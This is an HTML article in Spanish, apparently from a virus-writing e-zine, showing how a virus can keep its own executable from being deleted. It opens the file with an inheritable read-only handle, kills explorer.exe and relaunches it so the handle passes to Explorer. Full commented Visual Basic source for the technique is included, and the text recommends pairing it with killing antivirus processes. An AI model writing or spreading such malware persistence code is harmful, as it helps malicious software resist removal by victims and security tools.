
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0080c0; 
	SCROLLBAR-SHADOW-COLOR: #0080c0; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #c0c0c0; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style99 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }
.style103 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #FF0000; }
.style104 {color: #999999}


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Protegiendo un ejecutable del borrado</span><br>
    #Autor: <strong>MachineDramon</strong></span><br>
    <span class="style103">#Este articulo contiene un source</span><br>
    </p>
  </div>
  <div align="left">
    <p align="justify" class="style55">Vamos a ver una forma de &quot;proteger&quot; un poco el ejecutable de nuestro
    virus.</p>
    <p align="justify" class="style55">Usaremos la api CreateFile que nos permite crear o abrir un archivo:</p>
    <p align="justify" class="style99">Private Declare Function CreateFile Lib &quot;kernel32&quot; Alias &quot;CreateFileA&quot; <br>
    (ByVal lpFileName As String, <br>
    ByVal dwDesiredAccess As Long, <br>
    ByVal dwShareMode As Long, <br>
    lpSecurityAttributes As SECURITY_ATTRIBUTES, <br>
    ByVal dwCreationDisposition As Long, <br>
    ByVal dwFlagsAndAttributes As Long, <br>
    ByVal hTemplateFile As Long) As Long</p>
    <p align="justify" class="style55">Donde:</p>
    <p align="justify" class="style55"><span class="style104">lpFilename</span>: cadena con la ruta y nombre de archivo que se quiere crear
    o abrir.<br>
    ------------------------------------------------------------------------<br>
    <span class="style104">dwDesiredAccess</span>: es el modo de acceso que se quiere tener al archivo,
    generalmente se usa <span class="style104">GENERIC_READ</span> (Lectura) , <span class="style104">GENERIC_WRITE</span> (Escritura)
    o ambos ,(xp soporta otros modos).<br>
    ------------------------------------------------------------------------<br>
    dwShareMode: es el modo en que compartiremos el archivo abierto con
    otros procesos, puede ser <span class="style104">FILE_SHARE_READ</span> (Compartido para lectura)    <span class="style104">FILE_SHARE_WRITE</span> (Compartido para escritura) o ambos, si ponemos 0
    no se compartira.<br>
    ------------------------------------------------------------------------<br>
    <span class="style104">lpSecurityAttributes</span>: (Opcional) es una estructura del tipo SECURITY_ATTRIBUTES</p>
    <p align="justify" class="style99"> Private Type SECURITY_ATTRIBUTES<br>
    nLength As Long<br>
    lpSecurityDescriptor As Long<br>
    bInheritHandle As Long<br>
    End Type</p>
    <p align="justify" class="style55"> Donde: <br>
      <span class="style104">nLength</span>: tama&ntilde;o de la estructura.</p>
    <p align="justify" class="style55"> <span class="style104">lpSecurityDescriptor</span>: descriptor de seguridad, esto se usa en los NT
    nose bien que significa, le ponemos 0.</p>
    <p align="justify" class="style55"> <span class="style104">bInheritHandle</span>: valor booleano que indica si el handle obtenido
    sera heredable o no; True para que sea heredable y False para que no<br>
    lo sea.<br>
    ------------------------------------------------------------------------</p>
    <p align="justify" class="style55"><span class="style104">dwCreationDisposition</span>: opciones que indican el comportamiento de la funcion
    si el archivo no existe o si existe, por ejemplo:</p>
    <p align="justify" class="style99">CREATE_NEW = 1       'Crea uno nuevo, si existe el archivo falla<br>
    CREATE_ALWAYS = 2    'Crea uno nuevo siempre, si existe lo sobreescribe<br>
    OPEN_ALWAYS = 4      'Abre un archivo, si no existe lo crea<br>
    OPEN_EXISTING = 3    'Abre un archivo, si no existe falla</p>
    <p align="justify" class="style55">(hay m&aacute;s opciones)<br>
    ------------------------------------------------------------------------<br>
    <span class="style104">dwFlagsAndAttributes</span>: (Opcional) valido si estamos creando el archivo, aqui se
    especifican los atributos del archivo a crear, Ejemplo:</p>
    <p align="justify" class="style99">FILE_ATTRIBUTE_ARCHIVE = &amp;H20   'Atributos dearchivo<br>FILE_ATTRIBUTE_HIDDEN = &amp;H2     'Archivo oculto<br>FILE_ATTRIBUTE_NORMAL = &amp;H80    'sin atributos<br>FILE_ATTRIBUTE_READONLY = &amp;H1   'solo lectura<br>FILE_ATTRIBUTE_SYSTEM = &amp;H4     'archivo de sistema</p>
    <p align="justify" class="style55">(hay otros attributos)<br>
    (se pueden combinar los atributos con el signo +)<br>
    ------------------------------------------------------------------------<br>
    <span class="style104">hTemplateFile</span>: (Opcional) handle a un archivo abierto que servira de plantilla
    para el creado. El creado heredara sus atributos.<br>
    ------------------------------------------------------------------------</p>
    <p align="justify" class="style55">Lo que nos interesa de esta funcion es su argumento dwShareMode
    ya que suponiendo que abrimos un archivo y colocamos 0 en ese argumento,<br>
    (que no se comparta), ningun otro proceso tendra acceso al archivo que 
    hemos abierto mientras nosotros seamos propietarios de &eacute;l, y somos <br>
    propietarios, mientras tengamos el handle al archivo (que lo perdemos al 
    llamar a CloseHandle) y si no llamamos a CloseHandle, seremos propietarios, 
    mientras nos estemos ejecutando.</p>
    <p align="justify" class="style55">Normalmente se llama a CreateFile:</p>
    <p align="justify" class="style99">HANDLE = CreateFile(argumentos)<br>
&lt;operaciones que hacemos al archivo&gt;<br>
    CloseHandle(HANDLE)</p>
    <p align="justify" class="style55">Cuando abrimos un archivo con CreateFile se crea un &quot;objeto&quot; y nos devuelve
    un handle(manejador) al objeto, y si la teoria no me falla, el sistema
    solo elimina un objeto cuando ya no hay handles que apunten a el.Entonces el objeto existira mientras haya un proceso que tenga un handle a 
    �l, los permisos del objeto se conservan, osea que mientras exista un
    proceso con un handle al archivo, sus opciones de comparticion con otros
    procesos se mantienen.</p>
    <p align="justify" class="style55">Ahora el handle puede pasarse de un proceso a otro(en cierta forma).<br>
    Si un proceso A obtiene un handle al archivo File con la opcion de que sea
    heredable y luego A inicia un proceso B (con CreateProcess) con la opcion
    de heredarle sus handle, entonces, ahora A y B tendran un handle a File.</p>
    <p align="justify" class="style55">Bueno ahora la idea de este texto, el virus abrira su propio ejecutable
    para acceso de LECTURA y se compartira solo con permiso de LECTURA
    y con la opcion de que el handle sea heredable, obtendra un handle a su 
    ejecutable y NO llamara a CloseHandle</p>
    <p align="justify" class="style55">Ahora mientras el virus tenga el handle ningun proceso podra acceder al
    archivo, mas que para leerlo. Estaran diciendo, eso se logra solo con
    que el virus se este ejecutando, ya con eso su ejecutable no se puede borrar
    y bastara que cierren el proceso del virus para que el handle se pierda y
    lo puedan borrar, pos si, pero todavia falta una parte de la idea.</p>
    <p align="justify" class="style55">Entonces el virus tiene un handle heredable a si mismo, ahora vamos a
    heredarlo a otro proceso, y el proceso al que se lo heredaremos era el
    del explorer.exe, para eso deberemos cerrar el explorer.exe y luego
    ejecutarlo con createprocess como un proceso hijo, eredandole el handle
    al ejecutable del virus, entonces suponiendo el user actualiza su av
    y este detecta el virus, pero no lo puede eliminar porque esta en ejecucion
    entonces el user se baja un visor de procesos y termina el proceso del virus
    y hay se podria ormalmente eliminar con el av o el mismo user eliminaria el
    archivo, pero como ahora el explorer.exe tiene un handle al archivo
    y como dijimos antes, mientras exista un handle los permisos se conservan
    entonces, aunque el virus ya no este en ejecucion, su archivo no se podra
    borrar, porque no tendra permiso de escritura.
    el user podra tratar de borrar el archivo, abriendo el explorador de
    windows que es el explorer.exe y buscando el archivo para borrarlo, pero
    tampoco podra, porque el explorer.exe tiene el handle, pero solo con acceso
    de lectura, recordar que el virus le heredo un handle de solo lectura.
    Para borrar un archivo, hay que tener acceso a el con permiso de escritura.<br>
    Bastaria con que el user cierre el proceso del explorer.exe ,inicie otro
    y nos borre, pero el user no sabe que el explorer.exe nos esta protegiendo.</p>
    <p align="justify" class="style55">Esto m&aacute;s que todo nos puede servir para protegernos del usuario que termine
    nuestro proceso y trate de borrarnos a mano, de los antivirus no creo que
    proteja para nada, porque la vacuna en tiempo real nos eliminaria en el
    proximo reinicio, aunque con la vacuna del The Hacker Antivirus en Win98
    (no he probado en winXP) si funka
    osea para tener mayor proteccion contra avs, esto debe usarse en combinaci-<br>
    on con tecnicas retrovirales, como el cierre de ventanas y procesos de 
    avs, etc.</p>
    <p align="justify" class="style55">Esto nos puede dar un poco de proteccion, aunque nos podran borrar de otras<br>
    muchas formas.</p>
    <p class="style55"><em>Codigo de Ejemplo en VB:</em><br>
    ---------------------------------------------------------------------------<br>
    <span class="style104">'Apis, estructuras y constantes que usaremos<br>
    Private Declare Function GetModuleFileName Lib &quot;kernel32&quot; Alias &quot;GetModuleFileNameA&quot; (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long<br>
    Private Declare Function GetWindowsDirectory Lib &quot;kernel32&quot; Alias &quot;GetWindowsDirectoryA&quot; (ByVal lpBuffer As String, ByVal nSize As Long) As Long<br>
    Private Declare Function GetCurrentProcess Lib &quot;kernel32&quot; () As Long<br>
    Private Declare Function SetPriorityClass Lib &quot;kernel32&quot; (ByVal hProcess As Long, ByVal dwPriorityClass As Long) As Long<br>
    Private Const HIGH_PRIORITY_CLASS = &amp;H80<br>
    Private Const NORMAL_PRIORITY_CLASS = &amp;H20</span></p>
    <p class="style99">Private Declare Function CreateFile Lib &quot;kernel32&quot; Alias &quot;CreateFileA&quot; (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As SECURITY_ATTRIBUTES, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long<br>
  Private Declare Function CloseHandle Lib &quot;kernel32&quot; (ByVal hObject As Long) As Long<br>
  Private Const GENERIC_READ = &amp;H80000000<br>
  Private Const FILE_SHARE_READ = &amp;H1<br>
    Private Const OPEN_EXISTING = 3</p>
    <p class="style99">Private Type SECURITY_ATTRIBUTES<br>
    nLength As Long<br>
    lpSecurityDescriptor As Long<br>
    bInheritHandle As Long<br>
    End Type</p>
    <p class="style99">Private Declare Function FindWindow Lib &quot;user32&quot; Alias &quot;FindWindowA&quot; (ByVal lpClassName As String, ByVal lpWindowName As String) As Long<br>
  Private Declare Function GetWindowThreadProcessId Lib &quot;user32&quot; (ByVal hwnd As Long, lpdwProcessId As Long) As Long</p>
    <p class="style99">Private Declare Function OpenProcess Lib &quot;kernel32&quot; (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long<br>
  Private Declare Function TerminateProcess Lib &quot;kernel32&quot; (ByVal hProcess As Long, ByVal uExitCode As Long) As Long<br>
  Private Const PROCESS_TERMINATE = &amp;H1</p>
    <p class="style99">Private Declare Function CreateProcess Lib &quot;kernel32&quot; Alias &quot;CreateProcessA&quot; (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Long, lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Long, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long<br>
    Private Type STARTUPINFO<br>
    cb As Long<br>
    lpReserved As String<br>
    lpDesktop As String<br>
    lpTitle As String<br>
    dwX As Long<br>
    dwY As Long<br>
    dwXSize As Long<br>
    dwYSize As Long<br>
    dwXCountChars As Long<br>
    dwYCountChars As Long<br>
    dwFillAttribute As Long<br>
    dwFlags As Long<br>
    wShowWindow As Integer<br>
    cbReserved2 As Integer<br>
    lpReserved2 As Long<br>
    hStdInput As Long<br>
    hStdOutput As Long<br>
    hStdError As Long<br>
    End Type</p>
    <p class="style99">Private Type PROCESS_INFORMATION<br>
    hProcess As Long<br>
    hThread As Long<br>
    dwProcessId As Long<br>
    dwThreadId As Long<br>
    End Type</p>
    <p class="style99">Private Const STARTF_USESHOWWINDOW = &amp;H1<br>
    Private Const SW_NORMAL = 1<br>
    '_________________________________________________________________________<br>
    Private Sub Form_Load()<br>
    On Error Resume Next<br>
    'Declaramos variables y obtenemos la ruta del directorio de windows<br>
    'y la ruta de nuestro ejecutable<br>
    Dim miRuta As String, windir As String, l As Long<br>
    miRuta = Space$(255): windir = Space$(255)<br>
    l = GetModuleFileName(0, miRuta, 255): miRuta = Left$(miRuta, l)<br>
    l = GetWindowsDirectory(windir, 255): windir = Left$(windir, l)</p>
    <p class="style99"> 'como el tiempo entre que cerramos el explorer.exe y lo volvemos a<br>
    'ejecutar debe ser el menos posible, subimos la prioridad a nuestro<br>
    'proceso, para ganar velocidad<br>
    'GetCurrentProcess segun teoria nos da un &quot;pseudohandle&quot; a nuestro<br>
    'proceso, pero es manejador al proceso<br>
    'a SetPriorityClass le pasamos el handle al proceso y el nivel de prioridad<br>
    'a establecer<br>
    Call SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS)</p>
    <p class="style99"> 'mas variables, T igualamos a Timer (Timer da el numero de segundos<br>
    'que han pasado desde las 12 de la noche)<br>
    Dim He As Long, pid As Long<br>
    He = 0: T = Timer</p>
    <p class="style99"> 'iniciamos un bucle, que terminara cuando He sea diferente de 0<br>
    'o hayan pasado m&aacute;s de 300 segundos (5 minutos)<br>
    Do While (He = 0)<br>
    'esto es para averiguar el indentificador de proceso(PID) del <br>
    'explorer.exe, con FindWindow buscamos la ventana cuya clase<br>
    'es Shell_TrayWnd, que es la barra de inicio, que es una ventana<br>
    'del explorer.exe, si la encuentra nos devuelve el handle de la ventana<br>
    He = FindWindow(&quot;Shell_TrayWnd&quot;, vbNullString)<br>
    If Format(Timer - T, &quot;0.00&quot;) &gt; 300 Then Exit Sub<br>
    Loop</p>
    <p class="style99"> 'si obtuvimos un handle, lo pasamos a GetWindowThreadProcessId, que nos<br>
    'devuelve el PID del explorer.exe en la var pid<br>
    If (He &lt;&gt; 0) Then Call GetWindowThreadProcessId(He, pid)</p>
    <p class="style99"> 'si obtuvimos un pid<br>
  If (pid &lt;&gt; 0) Then<br>
    Dim op As Long<br>
    'abrimos el proceso, con OpenProcess con la opcion PROCESS_TERMINATE,<br>
    'si tenemos permisos para terminar el proceso, nos devuelve un handle<br>
    'al proceso del explorer.exe, sino nos devolvera 0<br>
    op = OpenProcess(PROCESS_TERMINATE, 0, pid)<br>
    'si tenemos un handle<br>
    If (op &lt;&gt; 0) Then<br>
    'terminamos el proceso y liberamos el handle<br>
    Call TerminateProcess(op, 0)<br>
    Call CloseHandle(op)<br>
    End If<br>
    End If</p>
    <p class="style99"> 'declaramos una estructura SECURITY_ATTRIBUTES<br>
    Dim sa As SECURITY_ATTRIBUTES<br>
    sa.nLength = Len(sa)            'el tama&ntilde;o de la structura<br>
    sa.bInheritHandle = True        'establecemos que el handle sea heredable<br>
    sa.lpSecurityDescriptor = 0     'esto no lo usamos, ponemos 0 (que sera esto?)</p>
    <p class="style99"> 'abrimos nuestro ejecutable con acceso de lectura y modo compartido<br>
    'de solo lectura y CreateFile nos devuelve un handle al archivo en Hl<br>
    Dim Hl As Long<br>
    Hl = CreateFile(miRuta, GENERIC_READ, FILE_SHARE_READ, sa, OPEN_EXISTING, 0, 0)<br>
    'NO llamamos a CloseHandle<br>
    '''Call CloseHandle(Hl)</p>
    <p class="style99"> 'declaramos estructuras STARTUPINFO y PROCESS_INFORMATION<br>
    Dim sp As STARTUPINFO, ip As PROCESS_INFORMATION<br>
    sp.cb = Len(sp)                    'tama&ntilde;o de la estructura<br>
    sp.dwFlags = STARTF_USESHOWWINDOW  'indicamos que use el valor pasado en el miembro .wShowWindow<br>
    sp.wShowWindow = SW_NORMAL         'indica como mostrar la ventana del proceso que se va a iniciar</p>
    <p class="style99"> 'iniciamos el proceso, observese el 5&deg; argumento que es 1 (True) y que <br>
    'indica que se heredaran los handles del proceso padre al proceso hijo<br>
    Call CreateProcess(windir &amp; &quot;\explorer.exe&quot;, vbNullString, ByVal 0&amp;, ByVal 0&amp;, ByVal 1, ByVal 0, ByVal 0&amp;, vbNullString, sp, ip)</p>
    <p class="style99"> 'volvemos a establecer la prioridad de nuestro proceso a normal<br>
    Call SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS)</p>
    <p class="style55"><span class="style104">'End<br>
    End Sub</span><br>
    ---------------------------------------------------------------------------</p>
    <p class="style55">Esto lo he probado en win98 y winXP, ha veces el explorer abierto se ha
    vuelto un inestable y a veces no (o sera mi windows, que siempre se le anda
    colgando el explorer), no lo he probado en cuentas limitadas en XP.</p>
</div>
</body>
</html>
